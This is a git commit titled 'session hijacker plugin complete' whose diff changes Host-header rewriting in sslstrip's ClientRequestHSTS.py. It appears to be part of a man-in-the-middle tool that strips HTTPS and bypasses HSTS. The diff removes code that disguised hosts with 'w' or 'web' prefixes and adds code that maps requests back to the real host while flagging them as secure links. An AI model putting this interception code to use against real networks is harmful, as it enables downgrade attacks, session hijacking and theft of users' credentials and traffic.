session hijacker plugin complete

2025-08-19 21:13:26 -07:00 · 2014-11-29 15:30:43 +01:00 · 2014-11-29 15:30:43 +01:00 · 3fe93f0467
commit 3fe93f0467
parent fcbc2254bd
5 changed files with 109 additions and 31 deletions
--- a/sslstrip/ClientRequestHSTS.py
+++ b/sslstrip/ClientRequestHSTS.py
@ -76,22 +76,11 @@ class ClientRequest(Request):
        	del headers['if-none-match']
        	
        if 'host' in headers:
-            real_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
-        	#logging.info("Modifing HOST header: %s -> %s" % (headers['host'],host))
-            if 'www.' in real_host:
-                fake_host = 'w' + real_host
-                headers['host'] = fake_host
-                fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
-                headers['securelink'] = '1'
-                self.setHeader('Host', fake_host)
-                logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
-            else:
-                fake_host = 'web' + real_host
-                headers['host'] = fake_host
-                fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
-                headers['securelink'] = '1'
-                self.setHeader('Host', fake_host)
-                logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
+            host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+            logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
+            headers['host'] = host
+            headers['securelink'] = '1'
+            self.setHeader('Host',host)

        return headers